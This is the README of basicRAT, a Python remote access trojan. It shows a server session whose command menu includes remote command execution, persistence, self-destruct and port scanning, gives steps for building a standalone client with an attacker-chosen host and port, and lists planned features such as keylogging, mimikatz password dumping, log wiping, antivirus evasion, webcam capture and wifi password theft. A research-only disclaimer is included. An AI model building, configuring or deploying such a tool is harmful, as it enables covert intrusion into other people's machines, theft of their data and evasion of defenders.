
python remote access trojan

Primary LanguagePythonThe UnlicenseUnlicense


This is a cross-platform Python Remote Access Trojan (RAT), basicRAT was created to maintain a clean design full-featured Python RAT. Currently a work in progress and still being actively hacked on.

Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. Accessing a computer system or network without authorization or explicit permission is illegal.


  • Cross-platform (Windows, Linux, and macOS)
  • AES GCM encrypted C2 with D-H exchange
  • Accepts connection from multiple clients
  • Command execution
  • File upload/download (a bit buggy since crypto change)
  • Standard utilities (wget, unzip)
  • System survey


$ python basicRAT_server.py --port 1337

 ____    ____  _____ ____   __  ____    ____  ______      .  ,
|    \  /    |/ ___/|    | /  ]|    \  /    ||      |    (\;/)
|  o  )|  o  (   \_  |  | /  / |  D  )|  o  ||      |   oo   \//,        _
|     ||     |\__  | |  |/  /  |    / |     ||_|  |_| ,/_;~      \,     / '
|  O  ||  _  |/  \ | |  /   \_ |    \ |  _  |  |  |   "'    (  (   \    !
|     ||  |  |\    | |  \     ||  .  \|  |  |  |  |         //  \   |__.'
|_____||__|__| \___||____\____||__|\_||__|__|  |__|       '~  '~----''

basicRAT server listening for connections on port 1337.

[?] basicRAT> help

client <id>         - Connect to a client.
clients             - List connected clients.
download <files>    - Download file(s).
execute <command>   - Execute a command on the target.
help                - Show this help menu.
kill                - Kill the client connection.
persistence         - Apply persistence mechanism.
quit                - Exit the server and end all client connections.
scan <ip>           - Scan top 25 ports on a single host.
selfdestruct        - Remove all traces of the RAT from the target system.
survey              - Run a system survey.
unzip <file>        - Unzip a file.
upload <files>      - Upload files(s).
wget <url>          - Download a file from the web.

[?] basicRAT> clients
ID - Client Address
 1 -

[?] basicRAT> client 1

[1] basicRAT> execute uname -a
Linux sandbox3 4.8.13-1-ARCH #1 SMP PREEMPT Fri Dec 9 07:24:34 CET 2016 x86_64 GNU/Linux

Build a stand-alone executable

Keep in mind that before building you will likely want to modify both the HOST and PORT variables located at the top of basicRAT_client.py to fit your needs.

On Linux you will need Python 2.x, PyInstaller, and pycrypto. Then run something like pyinstaller2 --onefile basicRAT_client.py and it should generate a dist/ folder that contains a stand-alone ELF executable.

On Windows you will need Python 2.x, PyInstaller, pycrypto, pywin32, and pefile. Then run something like C:\path\to\PyInstaller-3.2\PyInstaller-3.2\pyinstaller.py --onefile basicRAT_client.py and it should generate a dist/ folder that contains a stand-alone PE (portable executable).


  • Interactive shell
  • Client periodic connection attempt
  • Client binary generation tool (cross-platform)
    • Pyinstaller
    • Switch options for remote IP, port, etc
  • Persistence (cross-platform)
    • Windows: Registry keys, WMIC, Startup Dir
    • Linux: cron jobs, services, modprobe
    • macOS: LaunchAgent, LaunchDaemons
  • Self-destruct (remove the RAT entirely)
  • Privilege Escalation (getsystem-esque, dirty cow)
  • Common C2 Protocols (HTTP, DNS)
  • Clean log files
    • Linux: bash history, var logs, audit logs, etc
    • Windows: Event logs, prefetch, etc
  • Screenshot
  • Keylogger
  • Expand toolkit (unrar, sysinfo)
  • Scanning utilities (probe scan / ping sweep, scanning subnet)
  • Password dumping (mimikatz / gsecdump)
  • Tunneling / Pivoting (ssh)
  • Anti-virus detection and evasion
  • VM and Sandbox detection
  • Exfil browser history
  • Search file system for sensitive information using regex
    • addresses, credit cards numbers, socials, PII, etc
  • Detect web cameras and take snapshots
  • Steal wifi passwords



  • @bozhu, AES-GCM Python implementation.
  • @reznok, multiple client connection prototype.

Other open-source Python RATs for Reference